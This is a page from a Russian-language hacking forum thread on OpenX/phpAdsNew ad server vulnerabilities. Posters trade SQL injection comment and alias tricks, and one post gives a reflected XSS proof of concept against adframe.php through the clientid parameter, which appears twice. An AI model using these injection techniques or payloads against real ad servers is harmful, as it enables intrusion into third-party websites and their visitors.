Уязвимости Openx (phpAdsNew, Openads) - Страница 2

Boolean · 26.07.2012, 12:13

Цитата:

Сообщение от yusmat

в том то и дело что коментировать бесполезно так как запрос многострочный то есть содержит enter
отрезаеться только то что идет в первой строке остальное дает sql error

Используй алиас (`) вместо многострочного комментария.

Beched · 26.07.2012, 12:39

Цитата:

Сообщение от Boolean

Используй алиас (`) вместо многострочного комментария.

Так там дальше тоже они используются, не прокатит.

Если версия старше 5.забылкакой, то прокатит /*

get · 17.08.2012, 21:02

XSS (Версия не определена, но, предположительно, ветки phpAdsNew)
PoC:

Код:

/adframe.php?n=a4f592af&clientid=2'><script>alert(/asd/)</script>

17.08.2012, 21:02	#13
get Регистрация: 10.08.2012 Сообщений: 4 Репутация: 1	XSS (Версия не определена, но, предположительно, ветки phpAdsNew) PoC: Код: /adframe.php?n=a4f592af&clientid=2'><script>alert(/asd/)</script>

Опции темы	Поиск в этой теме
Версия для печати Отправить по электронной почте	Поиск в этой теме: Расширенный поиск
Опции просмотра
Линейный вид Комбинированный вид Древовидный вид